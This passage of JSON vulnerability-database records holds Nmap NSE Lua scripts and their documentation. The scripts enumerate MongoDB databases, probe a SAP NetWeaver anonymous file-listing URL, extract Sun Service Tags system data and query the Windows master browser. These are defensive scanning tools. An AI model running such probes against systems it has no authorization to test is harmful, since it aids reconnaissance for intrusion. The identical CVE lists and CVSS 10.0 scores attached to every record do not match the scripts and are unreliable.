\"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\nlocal mongodb = stdnse.silent_require \"mongodb\"\n\ndescription = [[\nAttempts to get a list of tables from a MongoDB database.\n]]\n\n---\n-- @usage\n-- nmap -p 27017 --script mongodb-databases <host>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 27017/tcp open unknown syn-ack\n-- | mongodb-databases:\n-- | ok = 1\n-- | databases\n-- | 1\n-- | empty = false\n-- | sizeOnDisk = 83886080\n-- | name = test\n-- | 0\n-- | empty = false\n-- | sizeOnDisk = 83886080\n-- | name = httpstorage\n-- | 3\n-- | empty = true\n-- | sizeOnDisk = 1\n-- | name = local\n-- | 2\n-- | empty = true\n-- | sizeOnDisk = 1\n-- | name = admin\n-- |_ totalSize = 167772160\n\n-- version 0.2\n-- Created 01/12/2010 - v0.1 - created by Martin Holst Swende <martin@swende.se>\n-- Revised 01/03/2012 - v0.2 - added authentication support <patrik@cqure.net>\n\nauthor = \"Martin Holst Swende\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\ndependencies = {\"mongodb-brute\"}\n\n\nportrule = shortport.port_or_service({27017}, {\"mongodb\", \"mongod\"})\n\nfunction action(host,port)\n\n local socket = nmap.new_socket()\n\n -- set a reasonable timeout value\n socket:set_timeout(10000)\n -- do some exception / cleanup\n local catch = function()\n socket:close()\n end\n\n local try = nmap.new_try(catch)\n\n try( socket:connect(host, port) )\n\n -- ugliness to allow creds.mongodb to work, as the port is not recognized\n -- as mongodb, unless a service scan was run\n local ps = port.service\n port.service = 'mongodb'\n local c = creds.Credentials:new(creds.ALL_DATA, host, port)\n for cred in c:getCredentials(creds.State.VALID + creds.State.PARAM) do\n local status, err = mongodb.login(socket, \"admin\", cred.user, cred.pass)\n if ( not(status) ) then\n return err\n end\n end\n port.service = ps\n\n local req, result, packet, err, status\n --Build 
packet\n status, packet = mongodb.listDbQuery()\n if not status then return result end-- Error message\n\n --- Send packet\n status, result = mongodb.query(socket, packet)\n if not status then return result end-- Error message\n\n port.version.name ='mongodb'\n port.version.product='MongoDB'\n nmap.set_port_version(host,port)\n\n local output = mongodb.queryResultToTable(result)\n if err ~= nil then\n stdnse.log_error(err)\n end\n if result ~= nil then\n return stdnse.format_output(true, output )\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:58", "description": "Detects SAP Netweaver Portal instances that allow anonymous access to the KM unit navigation page. This page leaks file names, ldap users, etc. \n\nSAP Netweaver Portal with the Knowledge Management Unit enable allows unauthenticated users to list file system directories through the URL '/irj/go/km/navigation?Uri=/'. \n\nThis issue has been reported and won't be fixed. \n\nReferences: \n\n * <https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm>\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. 
\n\n## Example Usage \n\n * nmap -p 80 --script http-sap-netweaver-leak <target>\n\n * nmap -sV --script http-sap-netweaver-leak <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 443/tcp open https syn-ack\n | http-sap-netweaver-leak:\n | VULNERABLE:\n | Anonymous access to SAP Netweaver Portal\n | State: VULNERABLE (Exploitable)\n | SAP Netweaver Portal with the Knowledge Management Unit allows attackers to obtain system information\n | including file system structure, LDAP users, emails and other information.\n |\n | Disclosure date: 2018-02-1\n | Check results:\n | Visit /irj/go/km/navigation?Uri=/ to access this SAP instance.\n | Extra information:\n | ~system\n | discussiongroups\n | documents\n | Entry Points\n | etc\n | Reporting\n | References:\n |_ https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [vulns](<../lib/vulns.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-19T05:00:46", "type": "nmap", "title": "http-sap-netweaver-leak NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-11-08T20:35:14", "id": "NMAP:HTTP-SAP-NETWEAVER-LEAK.NSE", "href": "https://nmap.org/nsedoc/scripts/http-sap-netweaver-leak.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal table = require \"table\"\n\ndescription = [[\nDetects SAP Netweaver Portal instances that allow anonymous access to the\n KM unit navigation page. This page leaks file names, ldap users, etc.\n\nSAP Netweaver Portal with the Knowledge Management Unit enable allows unauthenticated\nusers to list file system directories through the URL '/irj/go/km/navigation?Uri=/'.\n\nThis issue has been reported and won't be fixed.\n\nReferences:\n* https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm\n]]\n\n---\n-- @usage nmap -p 80 --script http-sap-netweaver-leak <target>\n-- @usage nmap -sV --script http-sap-netweaver-leak <target>\n--\n-- @output \n-- PORT STATE SERVICE REASON\n-- 443/tcp open https syn-ack\n-- | http-sap-netweaver-leak:\n-- | VULNERABLE:\n-- | Anonymous access to SAP Netweaver Portal\n-- | State: VULNERABLE (Exploitable)\n-- | SAP Netweaver Portal with the Knowledge Management Unit allows attackers to obtain system information\n-- | including file system structure, LDAP users, emails and other information.\n-- |\n-- | Disclosure date: 2018-02-1\n-- | Check results:\n-- | Visit /irj/go/km/navigation?Uri=/ to access this SAP instance.\n-- | Extra information:\n-- | ~system\n-- | discussiongroups\n-- | documents\n-- | Entry Points\n-- | etc\n-- | Reporting\n-- | References:\n-- |_ https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm\n--\n-- @xmloutput\n-- <table 
key=\"NMAP-1\">\n-- <elem key=\"title\">Anonymous access to SAP Netweaver Portal</elem>\n-- <elem key=\"state\">VULNERABLE (Exploitable)</elem>\n-- <table key=\"description\">\n-- <el em>SAP Netweaver Portal with the Knowledge Management Unit allows attackers to obtain system information
\n-- including file system structure, LDAP users, emails and other information.
</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"day\">1</elem>\n-- <elem key=\"year\">2018</elem>\n-- <elem key=\"month\">02</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2018-02-1</elem>\n-- <table key=\"check_results\">\n-- <elem>Visit /irj/go/km/navigation?Uri=/ to access this SAP instance.</elem>\n-- </table>\n-- <table key=\"extra_info\">\n-- <elem>&#x7e;system</elem>\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm</elem>\n-- </table>\n-- </table>\n-- </script>\n---\n\nauthor = \"Francisco Leon <@arphanetx>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\"}\n\nlocal evil_path = \"/irj/go/km/navigation?Uri=/\"\n\nportrule = shortport.http\n\naction = function(host, port)\n local vuln = {\n title = 'Anonymous access to SAP Netweaver Portal',\n state = vulns.STATE.NOT_VULN,\n description = [[\nSAP Netweaver Portal with the Knowledge Management Unit allows attackers to obtain system information\nincluding file system structure, LDAP users, emails and other information.\n ]],\n references = {\n 'https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm',\n },\n dates = {\n disclosure = {year = '2018', month = '02', day = '1'},\n },\n }\n\n local status_404, result_404, _= http.identify_404(host,port)\n if (status_404 and result_404 == 200 ) then\n stdnse.debug1(\"Exiting due to ambiguous response from web server on %s%:s.All URIs return status 200\", host.ip, port.number)\n return nil\n end\n\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n local output_table = stdnse.output_table()\n local options = {header={}, no_cache=true, bypass_cache=true}\n\n --We need a valid User Agent for SAP Netweaver Portal servers\n options['header']['User-Agent'] = \"Mozilla/5.0 (compatible; MSIE 10.6; Windows 
NT 6.1; Trident/5.0; InfoPath.2; SLCC1;\"\n ..\".NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0\"\n\n local response = http.get(host, port, evil_path, options)\n if response and response.status == 200 then\n if string.find(response.body,'logon') then\n stdnse.debug1(\"String 'logon' was found in this page. Exiting.\")\n return vuln_report:make_output(vuln)\n else\n local files = {}\n for file in string.gmatch(response.body, \"[Cc][Ll][Aa][Ss][Ss][=][\\\"]urTxtStd[\\\"]>([^$<]*.)</[Ss][Pp][Aa][Nn]>\") do\n table.insert(files, file)\n end\n if #files>0 then\n vuln.state = vulns.STATE.EXPLOIT\n\tvuln.extra_info = files\n\tvuln.check_results = string.format(\"Visit %s to obtain more information about the files.\", evil_path)\n end\n return vuln_report:make_output(vuln)\n end\n else\n stdnse.debug1(\"SAP Netweaver Portal not found.\")\n return vuln_report:make_output(vuln)\n end\n \nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:36:02", "description": "Attempts to extract system information (OS, hardware, etc.) from the Sun Service Tags service agent (UDP port 6481). 
\n\nBased on protocol specs from <http://arc.opensolaris.org/caselog/PSARC/2006/638/stdiscover_protocolv2.pdf> <http://arc.opensolaris.org/caselog/PSARC/2006/638/stlisten_protocolv2.pdf> <http://arc.opensolaris.org/caselog/PSARC/2006/638/ServiceTag_API_CLI_v07.pdf>\n\n## Example Usage \n \n \n nmap -sU -p 6481 --script=servicetags <target>\n\n## Script Output \n \n \n | servicetags:\n | URN: urn:st:3bf76681-5e68-415b-f980-abcdef123456\n | System: SunOS\n | Release: 5.10\n | Hostname: myhost\n | Architecture: sparc\n | Platform: SUNW,SPARC-Enterprise-T5120::Generic_142900-13\n | Manufacturer: Sun Microsystems, Inc.\n | CPU Manufacturer: Sun Microsystems, Inc.\n | Serial Number: ABC123456\n | HostID: 12345678\n | RAM: 16256\n | CPUs: 1\n | Cores: 4\n | Virtual CPUs: 32\n | CPU Name: UltraSPARC-T2\n | CPU Clock Rate: 1165\n | Service Tags\n | Solaris 10 Operating System\n | Product Name: Solaris 10 Operating System\n | Instance URN: urn:st:90592a79-974d-ebcc-c17a-b87b8eee5f1f\n | Product Version: 10\n | Product URN: urn:uuid:5005588c-36f3-11d6-9cec-fc96f718e113\n | Product Parent URN: urn:uuid:596ffcfa-63d5-11d7-9886-ac816a682f92\n | Product Parent: Solaris Operating System\n | Product Defined Instance ID:\n | Timestamp: 2010-08-10 07:35:40 GMT\n | Container: global\n | Source: SUNWstosreg\n | SUNW,SPARC-Enterprise-T5120 SPARC System\n | Product Name: SUNW,SPARC-Enterprise-T5120 SPARC System\n | Instance URN: urn:st:51c61acd-9f37-65af-a667-c9925a5b0ee9\n | Product Version:\n | Product URN: urn:st:hwreg:SUNW,SPARC-Enterprise-T5120:Sun Microsystems:sparc\n | Product Parent URN: urn:st:hwreg:System:Sun Microsystems\n | Product Parent: System\n | Product Defined Instance ID:\n | Timestamp: 2010-08-10 07:35:41 GMT\n | Container: global\n | Source: SUNWsthwreg\n | Explorer\n | Product Name: Explorer\n | Instance URN: urn:st:2dc5ab61-9bb5-409b-e910-fa39840d0d85\n | Product Version: 6.4\n | Product URN: urn:uuid:9cb70a38-7d15-11de-9d26-080020a9ed93\n | Product Parent URN:\n | 
Product Parent:\n | Product Defined Instance ID:\n | Timestamp: 2010-08-10 07:35:42 GMT\n | Container: global\n |_ Source: Explorer\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [match](<../lib/match.html>)\n * [os](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-02-22T04:32:51", "type": "nmap", "title": "servicetags NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SERVICETAGS.NSE", "href": "https://nmap.org/nsedoc/scripts/servicetags.html", "sourceData": "local nmap = require \"nmap\"\nlocal match = require \"match\"\nlocal os = require \"os\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to extract system information (OS, hardware, etc.) 
from the Sun Service Tags service agent (UDP port 6481).\n\nBased on protocol specs from\nhttp://arc.opensolaris.org/caselog/PSARC/2006/638/stdiscover_protocolv2.pdf\nhttp://arc.opensolaris.org/caselog/PSARC/2006/638/stlisten_protocolv2.pdf\nhttp://arc.opensolaris.org/caselog/PSARC/2006/638/ServiceTag_API_CLI_v07.pdf\n]]\n\n---\n-- @usage\n-- nmap -sU -p 6481 --script=servicetags <target>\n-- @output\n-- | servicetags:\n-- | URN: urn:st:3bf76681-5e68-415b-f980-abcdef123456\n-- | System: SunOS\n-- | Release: 5.10\n-- | Hostname: myhost\n-- | Architecture: sparc\n-- | Platform: SUNW,SPARC-Enterprise-T5120::Generic_142900-13\n-- | Manufacturer: Sun Microsystems, Inc.\n-- | CPU Manufacturer: Sun Microsystems, Inc.\n-- | Serial Number: ABC123456\n-- | HostID: 12345678\n-- | RAM: 16256\n-- | CPUs: 1\n-- | Cores: 4\n-- | Virtual CPUs: 32\n-- | CPU Name: UltraSPARC-T2\n-- | CPU Clock Rate: 1165\n-- | Service Tags\n-- | Solaris 10 Operating System\n-- | Product Name: Solaris 10 Operating System\n-- | Instance URN: urn:st:90592a79-974d-ebcc-c17a-b87b8eee5f1f\n-- | Product Version: 10\n-- | Product URN: urn:uuid:5005588c-36f3-11d6-9cec-fc96f718e113\n-- | Product Parent URN: urn:uuid:596ffcfa-63d5-11d7-9886-ac816a682f92\n-- | Product Parent: Solaris Operating System\n-- | Product Defined Instance ID:\n-- | Timestamp: 2010-08-10 07:35:40 GMT\n-- | Container: global\n-- | Source: SUNWstosreg\n-- | SUNW,SPARC-Enterprise-T5120 SPARC System\n-- | Product Name: SUNW,SPARC-Enterprise-T5120 SPARC System\n-- | Instance URN: urn:st:51c61acd-9f37-65af-a667-c9925a5b0ee9\n-- | Product Version:\n-- | Product URN: urn:st:hwreg:SUNW,SPARC-Enterprise-T5120:Sun Microsystems:sparc\n-- | Product Parent URN: urn:st:hwreg:System:Sun Microsystems\n-- | Product Parent: System\n-- | Product Defined Instance ID:\n-- | Timestamp: 2010-08-10 07:35:41 GMT\n-- | Container: global\n-- | Source: SUNWsthwreg\n-- | Explorer\n-- | Product Name: Explorer\n-- | Instance URN: 
urn:st:2dc5ab61-9bb5-409b-e910-fa39840d0d85\n-- | Product Version: 6.4\n-- | Product URN: urn:uuid:9cb70a38-7d15-11de-9d26-080020a9ed93\n-- | Product Parent URN:\n-- | Product Parent:\n-- | Product Defined Instance ID:\n-- | Timestamp: 2010-08-10 07:35:42 GMT\n-- | Container: global\n-- |_ Source: Explorer\n\n\n-- version 1.0\n\nauthor = \"Matthew Flanagan\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"discovery\", \"safe\"}\n\n\n-- Mapping from XML element names to human-readable table labels.\nlocal XML_TO_TEXT = {\n -- Information about the agent.\n system = \"System\",\n release = \"Release\",\n host = \"Hostname\",\n architecture = \"Architecture\",\n platform = \"Platform\",\n manufacturer = \"Manufacturer\",\n cpu_manufacturer = \"CPU Manufacturer\",\n serial_number = \"Serial Number\",\n hostid = \"HostID\",\n physmem = \"RAM\",\n sockets = \"CPUs\",\n cores = \"Cores\",\n virtcpus = \"Virtual CPUs\",\n name = \"CPU Name:\",\n clockrate = \"CPU Clock Rate\",\n\n -- Information about an individual svctag.\n product_name = \"Product Name\",\n instance_urn = \"Instance URN\",\n product_version = \"Product Version\",\n product_urn = \"Product URN\",\n product_parent_urn = \"Product Parent URN\",\n product_parent = \"Product Parent\",\n product_defined_inst_id = \"Product Defined Instance ID\",\n product_vendor = \"Product Vendor\",\n timestamp = \"Timestamp\",\n container = \"Container\",\n source = \"Source\",\n platform_arch = \"Platform Arch\",\n installer_uid = \"Installer UID\",\n version = \"Version\",\n}\n\n---\n-- Runs on UDP port 6481\nportrule = shortport.portnumber(6481, \"udp\", {\"open\", \"open|filtered\"})\n\nlocal get_agent, get_svctag_list, get_svctag\n\n---\n-- Sends Service Tags discovery packet to host,\n-- and extracts service information from results\naction = function(host, port)\n\n -- create the socket used for our connection\n local socket = nmap.new_socket()\n\n -- set a 
reasonable timeout value\n socket:set_timeout(5000)\n\n -- do some exception handling / cleanup\n local catch = function()\n socket:close()\n end\n\n local try = nmap.new_try(catch)\n\n -- connect to the potential service tags discoverer\n try(socket:connect(host, port))\n\n local payload\n\n payload = \"[PROBE] \".. tostring(os.time()) .. \"\\r\\n\"\n\n try(socket:send(payload))\n\n local status\n local response\n\n -- read in any response we might get\n response = try(socket:receive())\n socket:close()\n\n -- since we got something back, the port is definitely open\n nmap.set_port_state(host, port, \"open\")\n\n -- buffer to hold script output\n local output = {}\n\n -- We should get a response back that has contains one line for the\n -- agent URN and TCP port\n local urn, xport, split\n split = stringaux.strsplit(\" \", response)\n urn = split[1]\n xport = split[2]\n table.insert(output, \"URN: \" .. urn)\n\n if xport ~= nil then\n get_agent(host, xport, output)\n\n -- Check if any other service tags are registered and enumerate them\n local svctags_list\n status, svctags_list = get_svctag_list(host, xport, output)\n if status then\n local svctags = {}\n local tag\n for _, svctag in ipairs(svctags_list) do\n svctags['name'] = \"Service Tags\"\n status, tag = get_svctag(host, port, svctag)\n if status then\n svctags[#svctags + 1] = tag\n end\n end\n table.insert(output, svctags)\n end\n end\n\n port.name = \"servicetags\"\n nmap.set_port_version(host, port)\n\n return stdnse.format_output(true, output)\nend\n\nfunction get_agent(host, port, output)\n local socket = nmap.new_socket()\n local status, err, response\n socket:set_timeout(5000)\n\n status, err = socket:connect(host.ip, port, \"tcp\")\n if not status then\n return nil, err\n end\n status, err = socket:send(\"GET /stv1/agent/ HTTP/1.0\\r\\n\")\n if not status then\n socket:close()\n return nil, err\n end\n status, response = socket:receive_buf(match.pattern_limit(\"</st1:response>\", 2048), true)\n if 
not status then\n socket:close()\n return nil, response\n end\n\n socket:close()\n\n for elem, contents in string.gmatch(response, \"<([^>]+)>([^<]-)</%1>\") do\n if XML_TO_TEXT[elem] then\n table.insert(output,\n string.format(\"%s: %s\", XML_TO_TEXT[elem], contents))\n end\n end\n\n return true, output\nend\n\nfunction get_svctag_list(host, port)\n local socket = nmap.new_socket()\n local status, err, response\n socket:set_timeout(5000)\n\n status, err = socket:connect(host.ip, port, \"tcp\")\n if not status then\n return nil, err\n end\n status, err = socket:send(\"GET /stv1/svctag/ HTTP/1.0\\r\\n\")\n if not status then\n socket:close()\n return nil, err\n end\n status, response = socket:receive_buf(match.pattern_limit(\"</service_tags>\", 2048), true)\n if not status then\n socket:close()\n return nil, response\n end\n\n socket:close()\n\n local svctags = {}\n for svctag in string.gmatch(response, \"<link type=\\\"service_tag\\\" href=\\\"(.-)\\\" />\") do\n svctags[#svctags + 1] = svctag\n end\n\n return true, svctags\nend\n\nfunction get_svctag(host, port, svctag)\n local socket = nmap.new_socket()\n local status, err, response\n socket:set_timeout(5000)\n\n status, err = socket:connect(host.ip, port, \"tcp\")\n if not status then\n return nil, err\n end\n status, err = socket:send(\"GET \" .. svctag .. 
\" HTTP/1.0\\r\\n\")\n if not status then\n socket:close()\n return nil, err\n end\n status, response = socket:receive_buf(match.pattern_limit(\"</st1:response>\", 2048), true)\n if not status then\n socket:close()\n return nil, response\n end\n\n socket:close()\n\n local tag = {}\n for elem, contents in string.gmatch(response, \"<([^>]+)>([^<]-)</%1>\") do\n if elem == \"product_name\" then\n tag['name'] = contents\n end\n if XML_TO_TEXT[elem] then\n table.insert(tag,\n string.format(\"%s: %s\", XML_TO_TEXT[elem], contents))\n end\n end\n\n return true, tag\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:25", "description": "Queries information managed by the Windows Master Browser.\n\n## Script Arguments \n\n#### smb-mbenum.format \n\n(optional) if set, changes the format of the result returned by the script. There are three possible formats: 1\\. Ordered by type horizontally 2\\. Ordered by type vertically 3\\. Ordered by type vertically with details (default)\n\n#### smb-mbenum.domain \n\n(optional) if not specified, lists the domain of the queried browser\n\n#### smb-mbenum.filter \n\n(optional) if set, queries the browser for a specific type of server (@see ServerTypes)\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p 445 <host> --script smb-mbenum\n \n\n## Script Output \n \n \n | smb-mbenum:\n | Backup Browser\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | DFS Root\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Master Browser\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | SQL Server\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Server\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Server service\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Windows NT/2000/XP/2003 server\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Workstation\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n |_ WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n \n\n## Requires \n\n * [msrpc](<../lib/msrpc.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-06-19T18:47:19", "type": "nmap", "title": "smb-mbenum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SMB-MBENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-mbenum.html", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription=[[\nQueries information managed by the Windows Master Browser.\n]]\n\n---\n-- @usage\n-- nmap -p 445 <host> --script smb-mbenum\n--\n-- @output\n-- | smb-mbenum:\n-- | Backup Browser\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | DFS Root\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Master Browser\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | SQL Server\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Server\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Server service\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Windows NT/2000/XP/2003 server\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Workstation\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- |_ WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n--\n-- @args smb-mbenum.format (optional) if set, changes the format of the result\n-- returned by the script. There are three possible formats:\n-- 1. Ordered by type horizontally\n-- 2. Ordered by type vertically\n-- 3. 
Ordered by type vertically with details (default)\n--\n-- @args smb-mbenum.filter (optional) if set, queries the browser for a\n-- specific type of server (@see ServerTypes)\n--\n-- @args smb-mbenum.domain (optional) if not specified, lists the domain of the queried browser\n--\n\n--\n-- Version 0.1\n-- Created 06/11/2011 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nhostrule = function(host) return smb.get_port(host) ~= nil end\n\nlocal function log(msg) stdnse.debug3(\"%s\", msg) end\n\nServerTypes = {\n SV_TYPE_WORKSTATION = 0x00000001,\n SV_TYPE_SERVER = 0x00000002,\n SV_TYPE_SQLSERVER = 0x00000004,\n SV_TYPE_DOMAIN_CTRL = 0x00000008,\n SV_TYPE_DOMAIN_BAKCTRL = 0x00000010,\n SV_TYPE_TIME_SOURCE = 0x00000020,\n SV_TYPE_AFP = 0x00000040,\n SV_TYPE_NOVELL = 0x00000080,\n SV_TYPE_DOMAIN_MEMBER = 0x00000100,\n SV_TYPE_PRINTQ_SERVER = 0x00000200,\n SV_TYPE_DIALIN_SERVER = 0x00000400,\n SV_TYPE_SERVER_UNIX = 0x00000800,\n SV_TYPE_NT = 0x00001000,\n SV_TYPE_WFW = 0x00002000,\n SV_TYPE_SERVER_MFPN = 0x00004000,\n SV_TYPE_SERVER_NT = 0x00008000,\n SV_TYPE_POTENTIAL_BROWSER = 0x00010000,\n SV_TYPE_BACKUP_BROWSER = 0x00020000,\n SV_TYPE_MASTER_BROWSER = 0x00040000,\n SV_TYPE_DOMAIN_MASTER = 0x00080000,\n SV_TYPE_WINDOWS = 0x00400000,\n SV_TYPE_DFS = 